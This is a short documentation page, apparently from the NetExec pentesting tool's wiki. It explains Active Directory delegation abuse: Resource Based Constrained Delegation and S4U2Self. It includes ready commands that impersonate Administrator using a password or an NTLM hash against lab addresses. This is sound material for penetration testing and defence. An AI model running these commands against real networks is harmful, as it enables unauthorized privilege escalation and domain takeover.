🆕Delegation

Resource Based Constrained Delegation (RBCD) and

RBCD

If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control you can use the impersonate flag inside NetExec to automatically execute the Resource Based Constrained Delegation and impersonate any user:

nxc smb 192.168.56.11 -u jon.snow -p iknownothing --delegate Administrator

S4U2Self

If you have a computer account you can (nearly) always get local administrator with the s4u2self extension:

nxc smb 192.168.56.10 -u 'KINGSLANDING$' -H 220fc1990391bdc183d1a68c389c0229 --delegate Administrator --self

Resources:

(RBCD) Resource-based constrained | The Hacker Recipeswww.thehacker.recipes

S4U2self abuse | The Hacker Recipeswww.thehacker.recipes

Resource-based Constrained Delegation - HackTricksbook.hacktricks.xyz

PreviousChecking Credentials (Local)NextCommand Execution

Last updated 10 months ago

Was this helpful?

hashtagRBCD

hashtagS4U2Self

hashtagResources:

RBCD

S4U2Self

Resources: